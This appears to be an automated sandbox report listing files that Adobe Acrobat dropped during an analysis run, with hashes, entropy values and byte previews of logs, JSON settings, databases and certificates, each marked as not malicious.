                                                                                      MD5:53907F3500756B4908D56ED262DA9700
                                                                                      SHA1:0DA030C34B90F8526A613ABA1B9A2DCFDA6E7221
                                                                                      SHA-256:D2FBDFE3A8E0752E4C4C232BBDB42D7FB66392AC5F1300822AC5694B961EC0E4
                                                                                      SHA-512:D11430E8DD077C29F0CF5CA76283170E26C874083B25928B3AD99E489D6CAC9AE89618168ED50E359DC31900641FFF14DACA22CDF322841EFCF0ED8FB8366F6C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16384
                                                                                      Entropy (8bit):0.08158434391047377
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:V7mlXKYecCsr29mXlVG0+q2Iqe8lHer/l/allNTt/4ll/Q6beV/:pyKzeYUGE8lHejIHtc6V
                                                                                      MD5:40822A7B3567EB0BF06A718B79CCBAEA
                                                                                      SHA1:2D5DE8425214A6380F4120A0B97C6B1E047E2145
                                                                                      SHA-256:EF318D54B56F51300972CD2C1BC773F1A5F617BA6A537A1CF4D7CEB74075CBC4
                                                                                      SHA-512:019145FBE18941112C010030803DCE826FE5627B4A466AB0F28D8C5689B1259FB0E5B85BD197274FC97E3F047CF61095B25849EA52C2EBC5B521249F2560BD42
                                                                                      Malicious:false

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 287
Entropy (8bit): 5.279471017439473
Encrypted: false
SSDEEP: 6:7nwQ+q2PFi2nKuAl9OmbnIFUt8OHdSgZmw+OHdSQVkwOFi2nKuAl9OmbjLJ:7wVvdZHAahFUt8OHQg/+OHQI5wZHAaSJ
MD5: 1FAE92DF1050DE924A18277FA37C2EFE
SHA1: C920C971EEA15377BB3B649F780F13B73678E7CA
SHA-256: 43983504FB57968C4D3CA3E150329BE81F2FEA9D4EAC2685CAF99F7F4A4A807D
SHA-512: DDE950AF2DC1589F46AA4CDD08187189C87938D22C5B4431A56F75CF96575BD3B62B3DDB1BF8BC984678CF6FA00100E6D99FC91D652D5243A22E00D548AA80F3
Malicious: false
Preview: 2024/12/19-06:45:14.622 468 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:45:14.657 468 Recovering log #3.2024/12/19-06:45:14.657 468 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 287
Entropy (8bit): 5.279471017439473
Encrypted: false
SSDEEP: 6:7nwQ+q2PFi2nKuAl9OmbnIFUt8OHdSgZmw+OHdSQVkwOFi2nKuAl9OmbjLJ:7wVvdZHAahFUt8OHQg/+OHQI5wZHAaSJ
MD5: 1FAE92DF1050DE924A18277FA37C2EFE
SHA1: C920C971EEA15377BB3B649F780F13B73678E7CA
SHA-256: 43983504FB57968C4D3CA3E150329BE81F2FEA9D4EAC2685CAF99F7F4A4A807D
SHA-512: DDE950AF2DC1589F46AA4CDD08187189C87938D22C5B4431A56F75CF96575BD3B62B3DDB1BF8BC984678CF6FA00100E6D99FC91D652D5243A22E00D548AA80F3
Malicious: false
Preview: 2024/12/19-06:45:14.622 468 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:45:14.657 468 Recovering log #3.2024/12/19-06:45:14.657 468 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 334
Entropy (8bit): 5.2121731740618165
Encrypted: false
SSDEEP: 6:7JOq2PFi2nKuAl9Ombzo2jMGIFUt8OXmZmw+OTkwOFi2nKuAl9Ombzo2jMmLJ:7kvdZHAa8uFUt8OW/+OT5wZHAa8RJ
MD5: 90FA7ED9DB4458BEE3A642C4698C96C8
SHA1: FC22B2438027C82D319B986B7AC735DFDFE9A7B4
SHA-256: B11DC7F0578891A7B314C7F8B9CAA1876B35563459D68E9E9E503DFB6D94DDBD
SHA-512: DA44501C6AE4EEA5AA18218A208A8C2A7B4446DA7CACE70C2AFC3CAF724980C7B0B0256C73D8A7A3E33C074369A51A50BCE964965E7921259F98745541379FC4
Malicious: false
Preview: 2024/12/19-06:45:14.613 1fc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:45:14.616 1fc4 Recovering log #3.2024/12/19-06:45:14.617 1fc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 334
Entropy (8bit): 5.2121731740618165
Encrypted: false
SSDEEP: 6:7JOq2PFi2nKuAl9Ombzo2jMGIFUt8OXmZmw+OTkwOFi2nKuAl9Ombzo2jMmLJ:7kvdZHAa8uFUt8OW/+OT5wZHAa8RJ
MD5: 90FA7ED9DB4458BEE3A642C4698C96C8
SHA1: FC22B2438027C82D319B986B7AC735DFDFE9A7B4
SHA-256: B11DC7F0578891A7B314C7F8B9CAA1876B35563459D68E9E9E503DFB6D94DDBD
SHA-512: DA44501C6AE4EEA5AA18218A208A8C2A7B4446DA7CACE70C2AFC3CAF724980C7B0B0256C73D8A7A3E33C074369A51A50BCE964965E7921259F98745541379FC4
Malicious: false
Preview: 2024/12/19-06:45:14.613 1fc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:45:14.616 1fc4 Recovering log #3.2024/12/19-06:45:14.617 1fc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: JSON data
Category: modified
Size (bytes): 476
Entropy (8bit): 4.977306316743135
Encrypted: false
SSDEEP: 12:YH/um3RA8sqpsBdOg2HYAcaq3QYiubpP7E4TX:Y2sRdsLdMHYr3QYhbd7n7
MD5: 1E8E38C259778BB5F94CDD4A72BB9197
SHA1: CA0BCCD25BBC0D2A0AA37F506A2D921ACD002AC1
SHA-256: 988D8E01915D5080947E3CC95757D521E9CCE5DE90ABB170D79FB9F0D151503B
SHA-512: 1632886031BAE48A6B1397368FF9C73A4AE067CED66A7E93984E49E38E3FC65D483E1A9E9428F0C04E77E29A85DFE5EBAD1D1BC3D9DB3A6FFA047137DDEF6C5E
Malicious: false
Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168723299245","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":612567},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: JSON data
Category: dropped
Size (bytes): 476
Entropy (8bit): 4.962905575204746
Encrypted: false
SSDEEP: 12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
MD5: F371FDA655516B50D489FC8CFB1306C9
SHA1: 26FAC2270B5A1180925A6B601A8DA8AC188A0096
SHA-256: 730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
SHA-512: B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
Malicious: false
Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: JSON data
Category: dropped
Size (bytes): 476
Entropy (8bit): 4.962905575204746
Encrypted: false
SSDEEP: 12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
MD5: F371FDA655516B50D489FC8CFB1306C9
SHA1: 26FAC2270B5A1180925A6B601A8DA8AC188A0096
SHA-256: 730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
SHA-512: B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
Malicious: false
Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: JSON data
Category: dropped
Size (bytes): 476
Entropy (8bit): 4.962905575204746
Encrypted: false
SSDEEP: 12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
MD5: F371FDA655516B50D489FC8CFB1306C9
SHA1: 26FAC2270B5A1180925A6B601A8DA8AC188A0096
SHA-256: 730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
SHA-512: B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
Malicious: false
Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: data
Category: dropped
Size (bytes): 3878
Entropy (8bit): 5.230089927616618
Encrypted: false
SSDEEP: 96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEVQADc/DD:wshFT0h7cZb2EVKZPEANcGIK5EVQADc/
MD5: 8BE2AB5E639DA6AB34A861CA75CE5388
SHA1: 7FA1A9550EDEEC533C165D354F987CCC2A37F339
SHA-256: 1EA624BC22E65200D86BEA8FF46F4EF5E271E9C8DCD2BCA8C528E11EE7BFFB84
SHA-512: DFA3AF4FAB5336C3BF673E4FF3BFEAF8F8560783DE83B8C3322B90B41E12E24A362F6B7424C713C16D965A5000A5511B79E547568A10BD5BA34CFE0EB71EBF34
Malicious: false
Preview: *...#................version.1..namespace-#..o................next-map-id.1.Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/.0..QRr................next-map-id.2.Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/.2%e.o................next-map-id.4.Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/.3nU..^...............Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/"..C^...............Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/....a...............Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.+;|a...............Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/....o................next-map-id.5.Pnamespace-10b75d2f_11e7_4fa3_ae23_

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 322
Entropy (8bit): 5.259000194078981
Encrypted: false
SSDEEP: 6:7I1GMq2PFi2nKuAl9OmbzNMxIFUt8OI1Zmw+OIfaFkwOFi2nKuAl9OmbzNMFLJ:7I1zvdZHAa8jFUt8OI1/+OIu5wZHAa8E
MD5: 8E28CFE8894D8EB070D9FF5B3F86B15D
SHA1: 6DB101994F2B360AF948788816089836336794B8
SHA-256: 2E51458F0B7A035DAC814E67161773315BC2F3380D322EC88D2D6DC89DD630AC
SHA-512: 944C0C7B888F75217E7CC077000AD794462AC0BFA0C4AAC3328D67EF80954AB639AFDA0D9EF89530C7120D153FED5204E54003EDFA78B69D44D08FDD1D56A24B
Malicious: false
Preview: 2024/12/19-06:45:14.987 1fc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:45:14.988 1fc4 Recovering log #3.2024/12/19-06:45:14.989 1fc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 322
Entropy (8bit): 5.259000194078981
Encrypted: false
SSDEEP: 6:7I1GMq2PFi2nKuAl9OmbzNMxIFUt8OI1Zmw+OIfaFkwOFi2nKuAl9OmbzNMFLJ:7I1zvdZHAa8jFUt8OI1/+OIu5wZHAa8E
MD5: 8E28CFE8894D8EB070D9FF5B3F86B15D
SHA1: 6DB101994F2B360AF948788816089836336794B8
SHA-256: 2E51458F0B7A035DAC814E67161773315BC2F3380D322EC88D2D6DC89DD630AC
SHA-512: 944C0C7B888F75217E7CC077000AD794462AC0BFA0C4AAC3328D67EF80954AB639AFDA0D9EF89530C7120D153FED5204E54003EDFA78B69D44D08FDD1D56A24B
Malicious: false
Preview: 2024/12/19-06:45:14.987 1fc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:45:14.988 1fc4 Recovering log #3.2024/12/19-06:45:14.989 1fc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
Category: dropped
Size (bytes): 65110
Entropy (8bit): 0.6376462682686903
Encrypted: false
SSDEEP: 96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
MD5: 1468EB269F45D6EECE72317AF6B1587F
SHA1: AB52469CD54F341F71D8EEA78E5293C597CC2560
SHA-256: 56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
SHA-512: FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
Malicious: false
Preview: BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category: dropped
Size (bytes): 86016
Entropy (8bit): 4.439063528614613
Encrypted: false
SSDEEP: 384:yejci5GSiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:0CurVgazUpUTTGt
MD5: 30C90DFCD496D290FCB27B9ADE2BACDD
SHA1: E800AC38C38A70D3BCC81C1D861B521FC8FD85AD
SHA-256: 3B823959B1331DC60DD0F9542B48DFE95B282CAC3B3335DB0DA742304CB19810
SHA-512: 97AAD3FF301BFC6DD1A73E98BE94B436B9317D3CF86F087324218E3E2A775A565A7E8F7F1A79BD5CDE367B7B028279E65B9AE8AE6FD1029ECF8C4B01E3725D74
Malicious: false
Preview: SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: SQLite Rollback Journal
Category: dropped
Size (bytes): 8720
Entropy (8bit): 3.7765388081454168
Encrypted: false
SSDEEP: 48:7MMup/E2ioyVBFioy5oWoy1CUoy1+uKOioy1noy1AYoy1Wioy1hioybioyMqoy1D:7+pjuBFJb2XKQdIQlnb9IVXEBodRBkU
MD5: F3179C557A728EA05D45674DB4393753
SHA1: E7EB66ADBBB7CBEF7F57C6B3B57A584088CB7D3C
SHA-256: 0376D128B8748A48940A56F0F5309E46A9E9383086C05548CED2018080B8C4D0
SHA-512: 8DD77F414A5146D7BBB7B3DDDA151AB64EB1DA056CF85ECF97082AF0BD7C2236875644E6CBAF12B075787606B03B1F445C48C41DF83BD00E7F542888C3470137
Malicious: false
Preview: .... .c.....h=.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: Certificate, Version=3
Category: dropped
Size (bytes): 1391
Entropy (8bit): 7.705940075877404
Encrypted: false
SSDEEP: 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5: 0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1: CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256: 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512: 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious: false
Preview: 0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):71954
                                                                                      Entropy (8bit):7.996617769952133
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                      Malicious:false
                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):192
                                                                                      Entropy (8bit):2.756901573172974
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:kkFklgA8klfllXlE/HT8k1yhttNNX8RolJuRdxLlGB9lQRYwpDdt:kK5fT88y3NMa8RdWBwRd
                                                                                      MD5:C4744DA03453356822DED2E2FC706E4B
                                                                                      SHA1:D0DA05B98E2F93AC330F187495955CFC1177B111
                                                                                      SHA-256:66C440CC971A71358B80416BF85818837043A5D921EA82162099273F438C5973
                                                                                      SHA-512:3EB73A238ED8131C2DD1028E2E0D8F0074290A136E62ABA5BFD9AC0263297ACE95EF1D78A45B2B96C64004510853D487BE37783D81FA11B94335726291CE2E1B
                                                                                      Malicious:false
                                                                                      Preview:p...... .........e9~.R..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):3.150184159866505
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kK7i9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:DdDnLNkPlE99SNxAhUe/3
                                                                                      MD5:1400492B29CEC9207E3F9C65DB6F0B98
                                                                                      SHA1:78E064066133F8D32FC69563248BBB3F300F3B28
                                                                                      SHA-256:349B09397AD9FB23F034EF537D0627FD523C8654B7548DCF07F44102FA2312D9
                                                                                      SHA-512:86AE5F40F119D99FF2CC3B2EA8E3B262FAD461BAF577FD4CFCC6F571D9C17A66CB1FEDA0F254ACABD1953FF07D96514A5304D633BBC23814190D7DC2CFD95AAA
                                                                                      Malicious:false
                                                                                      Preview:p...... ..........g..R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.342944833692278
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJM3g98kUwPeUkwRe9:YvXKXsvyB3pUTbdFVGMbLUkee9
                                                                                      MD5:96603D350745E13E9FA8C0C178BC85A2
                                                                                      SHA1:D7365B332CEFB229B0387978E474A0DD476E8690
                                                                                      SHA-256:3F190849CF19BE991F8A86E70E3A27EB188BAB85286C1F411C636BF2717D1EEA
                                                                                      SHA-512:17DAA37300F32520E7BEA131B34DCFFEA14B745210E5D38991A6BFA049AAF5763DB26222CCA9967B0C43D502B0E465083BA33FE26D5C91C477CF6C63CFA079EA
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.277753369752202
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfBoTfXpnrPeUkwRe9:YvXKXsvyB3pUTbdFVGWTfXcUkee9
                                                                                      MD5:8A3E148F5555E35EE75796408D3DFC34
                                                                                      SHA1:4846E179646B2C0A89EB43322FF6F5258843FA8D
                                                                                      SHA-256:57E51773520D32F92D7D5EEA7AC3CD8CD9AA5DF93BF4C2F0665457A3A6E5F426
                                                                                      SHA-512:B3F898DC3DF2C4422706DC33268AF997D9B0144608F342C35C46B3AAEAF146FC133B89839CE6B2B8F258768AEAA8C06D1D480D5113716D863AEAC2EECA49655E
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.255892284497469
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfBD2G6UpnrPeUkwRe9:YvXKXsvyB3pUTbdFVGR22cUkee9
                                                                                      MD5:01D631683198251160164D56596DE038
                                                                                      SHA1:44A437BD08EAF3C5188653B034D67DAC035F93D7
                                                                                      SHA-256:F19F7590E67140182B1F85A4A6B4C1C30E20E4428A6058BE1C763D3758DBB227
                                                                                      SHA-512:E578182D8E68926D7CC896D88754B34D4C2DF8BDA4B4121F1DAB404C634485B8F1FAC5138A605C70DEA1A033B23EBB1B572341FFC52A0D058BF6C06C13AE7491
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):285
                                                                                      Entropy (8bit):5.316507103138238
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfPmwrPeUkwRe9:YvXKXsvyB3pUTbdFVGH56Ukee9
                                                                                      MD5:E21D907EC1AE0ABAF3BC90766618FCA9
                                                                                      SHA1:FCDB4BF73DDC07E9D23EA9EA8388B380DB30DD67
                                                                                      SHA-256:078E02D07EC89D30B9FF2375E6271DACAC7051129BB8F5B39B9B650A19FA04AA
